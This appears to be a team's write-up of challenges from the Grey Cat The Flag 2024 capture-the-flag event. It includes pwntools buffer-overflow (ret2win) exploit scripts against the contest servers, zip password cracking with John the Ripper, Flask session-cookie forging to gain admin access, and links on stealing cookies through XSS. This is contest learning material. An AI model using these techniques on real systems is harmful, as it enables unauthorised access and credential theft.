--- # System prepended metadata title: GREY CAT THE FLAG 2024 tags: [0n3_pu4ch_, CTF 2024, greycattheflag2024] --- --- title: 'Project documentation template' disqus: hackmd --- GREY CAT THE FLAG 2024 === [TOC] MICS ✅ --- ### Cats At The Beach ✍️ ### Grey Drivers ✍️ - First, you can see that Grey Cat is playing Hell Driver 2 and leave a note behind. - So I searched for the game Hell Driver 2, and found out that the list in the note is the name of weapon in Hell Driver 2. - In this game every weapon need a launch code to use, for example, the first weapon in the list is Eagle 500kg Bomb has this launch code(i searched it from the game's wiki): ![image](https://hackmd.io/_uploads/ByYuwcf-A.png) and we can follow the direction started from home: ![image](https://hackmd.io/_uploads/SkghsI5MW0.png) and for the first weapon, we have "grey{".Do the same to others weapon in the list, we have > Flag: `grey{i3mm_e1w3st_2_n3oU10o3E!}` ### All About Timing ✍️ The challenge is all about guessing the right number. So at first I tried to depend on the time that the server respond and use binary search. However it doesn't work, as the number change constantly. Until I realized the answer is the same if I submit them fast enough (the server will return back the right answer if we submit the wrong one) #### Code: ```python import time import random from pwn import * def time_guess(guess): conn = remote("challs.nusgreyhats.org", 31111) conn.recvuntil(b"Your guess:") conn.sendline(str(guess)) response = conn.recvline() response = response.replace(b"Wrong answer! The number I was thinking of was", b"").strip() print(response.decode()) conn.close() return response.decode() start=0 response1 = time_guess(start) print(response1) response2 = time_guess(response1) print(response2) ``` ![image](https://hackmd.io/_uploads/BJAGJAmb0.png) Here is the result, about the flag? > Flag: `grey{t1m3_i5_a_s0c1al_coNstRucT}` ### Cashhat The Ripper ✍️ - From the title, I guessed I could use johntheripper. - Although, using this tool in windows looks easy but it has some problem about the format of the hashcat: Ex: "Error: UTF-16 BOM seen in input file.", which forced you to decode to UF8 before cracking password. - I use Kali linux. - First, we use `zip2john` to take the hash cat of this zip file: ![image](https://hackmd.io/_uploads/ryIp_RXW0.png) Notes: Take this hashcat to a txt file help I easy to bruteforce. - Using 'john the ripper: `join`' brutefored password by hashcat ![image](https://hackmd.io/_uploads/SJcKFRQ-0.png) - The password is: `123mango` ![image](https://hackmd.io/_uploads/rkMJs07ZC.png) heheboizzz > Flag: `flag{W34k_P4ssw0rds_St4Nd_n0_Ch4nc3}` ### Out In Plain Sight ✍️ - ![image](https://hackmd.io/_uploads/Sktph0QW0.png) - "@nus.greyhats", first i guessed this is an ins or twitter account, not facebook (because it is not popular in Singapore ) - I osinted in ins first because i did not have X account :)) - The nearest video looks suspiciou. ![image](https://hackmd.io/_uploads/Skcr00mZC.png) - I downloaded it and saw it with 0.5x speed ![image](https://hackmd.io/_uploads/S15VkJE-C.png) - I saw this cipher text (from hex): `31 38 20 73 65 63 6f 6e 64 73` - This means: `18 seconds` - So I watched this video in 18 seconds more clearly. ![image](https://hackmd.io/_uploads/B1W3ky4-R.png) > Flag: `grey{y0uR_eYeS_aRe_ShArP}` Pwnable ✅ --- ### Baby Goods ✍️ #### Overall - Simple challenge #### Script *babygoods.c* ```cpp= #include #include #include char username[0x20]; int menu(char name[0x20]); int sub_15210123() { execve("/bin/sh", 0, 0); } int buildpram() { char buf[0x10]; char size[4]; int num; printf("\nChoose the size of the pram (1-5): "); fgets(size,4,stdin); size[strcspn(size, "\r\n")] = '\0'; num = atoi(size); if (1 > num || 5 < num) { printf("\nInvalid size!\n"); return 0; } printf("\nYour pram has been created! Give it a name: "); //buffer overflow! user can pop shell directly from here gets(buf); printf("\nNew pram %s of size %s has been created!\n", buf, size); return 0; } int exitshop() { puts("\nThank you for visiting babygoods!\n"); exit(0); } int menu(char name[0x20]) { char input[4]; do { printf("\nHello %s!\n", name); printf("Welcome to babygoods, where we provide the best custom baby goods!\nWhat would you like to do today?\n"); printf("1: Build new pram\n"); printf("2: Exit\n"); printf("Input: "); fgets(input, 4, stdin); input[strcspn(input, "\r\n")] = '\0'; switch (atoi(input)) { case 1: buildpram(); break; default: printf("\nInvalid input!\n==========\n"); menu(name); } } while (atoi(input) != 2); exitshop(); } int main() { setbuf(stdin, 0); setbuf(stdout, 0); printf("Enter your name: "); fgets(username,0x20,stdin); username[strcspn(username, "\r\n")] = '\0'; menu(username); return 0; } ``` A simple buffer overflow in buildpram() ```cpp! gets(buf); ``` ![image](https://hackmd.io/_uploads/B1ztIz4ZR.png) ```python= from pwn import * #r = process('./babygoods') r = remote( 'challs.nusgreyhats.org', 32345) payload = b'A'*40 payload += p64(0x401236) r.sendlineafter(b'Enter your name: ', b'Broder') r.sendlineafter(b'Input: ', b'1') r.sendlineafter(b'Choose the size of the pram (1-5): ', b'2') r.sendlineafter(b'Your pram has been created! Give it a name: ', payload) r.interactive() ``` ### The Mororala ✍️ *chall.c* ```cpp= #include #include #include #include #include #include #include char* pin; // this is the better print, because i'm cool like that ;) void slow_type(char* msg) { int i = 0; while (1) { if (!msg[i]) return; putchar(msg[i]); usleep(5000); i += 1; } } void view_message() { int fd = open("./flag.txt", O_RDONLY); char* flag = calloc(0x50, sizeof(char)); read(fd , flag, 0x50); close(fd); slow_type("\n\e[1;93mAfter several intense attempts, you successfully breach the phone's defenses.\nUnlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.\nThe once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the clandestine hideout takes an unexpected turn, becoming even more complicated.\n\e[0m"); printf("\n%s\n", flag); exit(0); } void retrieve_pin(){ FILE* f = fopen("./pin", "r"); pin = malloc(0x40); memset(pin, 0, 0x40); fread(pin, 0x30, 0x1, f); fclose(f); } void login() { char attempt[0x30]; int count = 5; for (int i = 0; i < 5; i++) { memset(attempt, 0, 0x30); printf("\e[1;91m%d TRIES LEFT.\n\e[0m", 5-i); printf("PIN: "); scanf("%s", attempt); if (!strcmp(attempt, pin)) { view_message(); } } slow_type("\n\e[1;33mAfter five unsuccessful attempts, the phone begins to emit an alarming heat, escalating to a point of no return. In a sudden burst of intensity, it explodes, sealing your fate.\e[0m\n\n"); } void banner() { slow_type("\e[1;33mAs you breached the final door to TACYERG's hideout, anticipation surged.\nYet, the room defied expectations – disorder reigned, furniture overturned, documents scattered, and the vault empty.\n'Yet another dead end,' you muttered under your breath.\nAs you sighed and prepared to leave, a glint caught your eye: a cellphone tucked away under unkempt sheets in a corner.\nRecognizing it as potentially the last piece of evidence you have yet to find, you picked it up with a growing sense of anticipation.\n\n\e[0m"); puts(" .--."); puts(" | | "); puts(" | | "); puts(" | | "); puts(" | | "); puts(" _.-----------._ | | "); puts(" .-' __ `-. | "); puts(" .' .' `. `.| "); puts(" ; : : ; "); puts(" | `.__.' | "); puts(" | ___ | "); puts(" | (_M_) M O T O R A L A | "); puts(" | .---------------------. | "); puts(" | | | | "); puts(" | | \e[0;91mYOU HAVE\e[0m | | "); puts(" | | \e[0;91m1 UNREAD MESSAGE.\e[0m | | "); puts(" | | | | "); puts(" | | \e[0;91mUNLOCK TO VIEW.\e[0m | | "); puts(" | | | | "); puts(" | `---------------------' | "); puts(" | | "); puts(" | __ | "); puts(" | ________ .-~~__~~-. | "); puts(" | |___C___/ / .' `. \\ | "); puts(" | ______ ; : OK : ; | "); puts(" | |__A___| | _`.__.'_ | | "); puts(" | _______ ; \\< | | >/ ; | "); puts(" | [_=] \n"); slow_type("\e[1;94mLocked behind a PIN, you attempt to find a way to break into the cellphone, despite only having 5 tries.\e[0m\n\n"); } void init() { setbuf(stdin, 0); setbuf(stdout, 0); retrieve_pin(); printf("\e[2J\e[H"); } int main() { init(); banner(); login(); } ``` In login(), you can see ***buffer overflow*** ```cpp! scanf("%s", attempt); ``` And, the function will print flag view_message() ```cpp= void view_message() { int fd = open("./flag.txt", O_RDONLY); char* flag = calloc(0x50, sizeof(char)); read(fd , flag, 0x50); close(fd); slow_type("\n\e[1;93mAfter several intense attempts, you successfully breach the phone's defenses.\nUnlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.\nThe once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the clandestine hideout takes an unexpected turn, becoming even more complicated.\n\e[0m"); printf("\n%s\n", flag); exit(0); } ``` Basically, you only calculate the offset to return address ![image](https://hackmd.io/_uploads/HJP0lzNZA.png) ***However, the problem happens here*** ![image](https://hackmd.io/_uploads/rkzqMMNbA.png) #### **See the solution in my ROP write up(ret2win):** [Rop Emporium](https://hackmd.io/@Broder/RopEmporium) ```python= from pwn import * win = p64(0x40138e) ret = p64(0x40101a) #r = process('./chall') r = remote('challs.nusgreyhats.org', 30211) offset = b'a'*72 payload = offset payload += ret payload += win r.sendlineafter(b'PIN: ', payload) r.interactive() ``` WEB --- ### Baby-web "I just learnt how to design my favourite flask webpage using htmx and bootstrap. I hope I don't accidentally expose my super secret flag." _First, I checked the python code: ![image](https://hackmd.io/_uploads/ryM11gLZ0.png) _Can see that it uses flask application in python. _It also has secret_key = "baby-web", and I see that the value is_admin = False. _With flask application, we use the tool [flask-unsign](https://github.com/Paradoxis/Flask-Unsign) combine with what we have seen in the source code, flask-unsign can forge a cookies that allow us to bypass admin.Use the following command ![image](https://hackmd.io/_uploads/rkRkwGUbR.png) and the result: ![image](https://hackmd.io/_uploads/SkUfvG8-0.png) now i change the cookie so that i can access to admin. ![image](https://hackmd.io/_uploads/SJDrPfIWC.png) but it isn't done yet.I check the source code and find this hidden button ![image](https://hackmd.io/_uploads/r1nYDf8WR.png) All i need to do now is modify the source code so that the secret button can appear.(delete hidden) ![image](https://hackmd.io/_uploads/rJTpPf8bC.png) And here comes the flag >Flag: grey{0h_n0_mY_5up3r_53cr3t_4dm1n_fl4g} ### Markdown parser "I built this simple markdown parser. Please give me some feedback (in markdown), I promise to read them all. Current features include: bold, italics, code blocks with syntax highlighting!" _First, i check the source code and the markdown code, the source code seem not provide anything useful, so i look at the markdown code. ![image](https://hackmd.io/_uploads/rJKsqww-0.png) _If line starts with \`\`\` it will be in code block, and the code block html0output is different from others, it lead us to the prevalent web vulnerability, XSS. _I have to do the research how XSS work, and what can it do.You can see in the link below: https://www.go4expert.com/articles/stealing-cookie-xss-t17066/ Briefly, it is a vulnarbility that you can inject your code from client input, it can help you steal cookies. _To fetch cookies using XXS, follow this, using Burpsite collaborator. https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies CHALLENGES chưa giải được!!! === MICS 🔥 (N_Muggle) --- ### ....✍️ Web 🔥 (Hyber) --- ### ....✍️ Pwnable 🔥 (Broder) --- ### ....✍️ Reverse 🔥 (AhnMaph) --- ### ....✍️ Crypto 🔥 (dvt) --- ### ....✍️ ###### tags: `0n3_pu4ch_` `greycattheflag2024`